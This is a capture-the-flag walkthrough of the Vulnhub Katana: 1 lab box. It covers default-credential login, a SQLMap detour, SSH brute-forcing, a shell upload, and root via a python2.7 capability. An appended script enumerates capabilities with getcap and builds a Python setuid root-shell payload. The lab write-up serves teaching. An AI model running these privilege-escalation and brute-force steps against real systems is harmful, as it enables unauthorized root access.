Vulnhub Katana: 1 Walkthrough

by Vince
in Blog

This box is described as "Intermediate" and the description states: "Get the root shell i.e. (root@localhost:~#) and then obtain flag under /root."

I'll admit, I'm getting a little worn out on the multiple web servers running on troll ports. It's basically the same box recycled with a different twist. That being said, the privilege escalation was excellent. There are multiple entrances to a low-privilege shell, and I cover two of them.

We kick off with Nmap:


Lots of open ports, like the previous boxes from this author. When we scan port 80 with Nikto, we find:


When we access it from the web browser, we find:


Scrolling down, we find:


Moving over to the admin page, we try admin / admin:


We're in!  I attempt to upload a shell:


But that errors out. When I look at the URL in the address bar, I see what could be SQL injection:


Mind you, this is a detour and it goes nowhere, but if you want to play around with it, this is how it starts:


We capture the POST request in Burp and save it to a file. We fire up SQLMap with that request file:


We find a database:


Let's enumerate the database:


We find a table and we get the column info:


Let's dump the table:


Cracking the hash confirms what we already know: the username is admin and the password is admin.


Circling back, and looking at the naming pattern of the pages, I guess that admin_edit.php might exist:


I attempt to upload a shell:


When I try to add it:


We get an error. 

Meanwhile, I'm brute-forcing SSH in the background and I find:


That's our first way in; I'm not sure it was the intended one. We SSH over to the box:


As I'm hunting around the various web servers, I find:


I think this was probably the intended entry:


We upload our shell:


Note the location of the uploaded file, but recognize that it is NOT served by this web server; it is served by the instance running on port 8715:


With our handler set up, we trigger the shell:


Getting in as www-data buys us nothing. Back to katana, I search for files with capabilities set and uncover:


Which leads us to:


With Python 2.7 carrying that capability, we can spawn a root shell. We get the flag and it's game over! I really like the privilege escalation; that was solid. It took me a bit to figure out because it doesn't show up in the privilege escalation scripts, or at least not in those I ran.
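As an added example (not part of the original walkthrough), here is the manual capability check worth running when the usual privesc scripts come up empty, fed with constructed getcap output standing in for the real scan, plus the Python payload that turns the capability into a root shell. The post only says python2.7 had capabilities set; the example assumes that capability was cap_setuid+ep, the one that makes os.setuid(0) succeed. The sample paths, the function names and the payload are mine, not the box author's.

```shell
#!/bin/sh
# Added example, not code from the original post. Assumes the capability on the
# target's python2.7 was cap_setuid+ep (the post only says "capabilities").

# On the target: list every file capability on the filesystem, hiding errors
# from unreadable paths. This is the one-liner the privesc scripts skipped.
enumerate_caps() {
    getcap -r / 2>/dev/null
}

# Filter getcap output down to capabilities that give a direct path to root.
# Handles both output formats: "path = caps" (older libcap) and "path caps"
# (libcap >= 2.41). Paths containing spaces are not handled.
triage_caps() {
    awk '
        {
            path = $1
            caps = ($2 == "=") ? $3 : $2
            if (caps ~ /cap_(setuid|setgid|dac_read_search|dac_override|sys_admin|sys_ptrace|sys_module)/)
                print path, caps
        }'
}

# Build the payload that turns cap_setuid on an interpreter into a root shell.
# Returned as a string (not executed) so this script is safe to source anywhere;
# on the box you paste the printed command into the katana session.
python_setuid_payload() {
    printf '%s\n' "$1 -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'"
}

# Constructed sample of getcap -r output (not captured from the real box),
# mixing harmless network capabilities with the interesting one.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/sbin/arping cap_net_raw=ep'

# Demo run over the constructed sample; on the target the pipeline is
# `enumerate_caps | triage_caps` instead of the printf.
printf '%s\n' "$SAMPLE_GETCAP" | triage_caps | while read -r path caps; do
    echo "dangerous capability: $path ($caps)"
    case "$path:$caps" in
        *python*:*cap_setuid*) echo "root shell via: $(python_setuid_payload "$path")" ;;
    esac
done
```

The triage filter is deliberately broader than this box needs: cap_dac_read_search and cap_dac_override also matter (reading /etc/shadow or the root flag directly), and cap_sys_admin or cap_sys_ptrace on an interpreter is just as game-ending as cap_setuid.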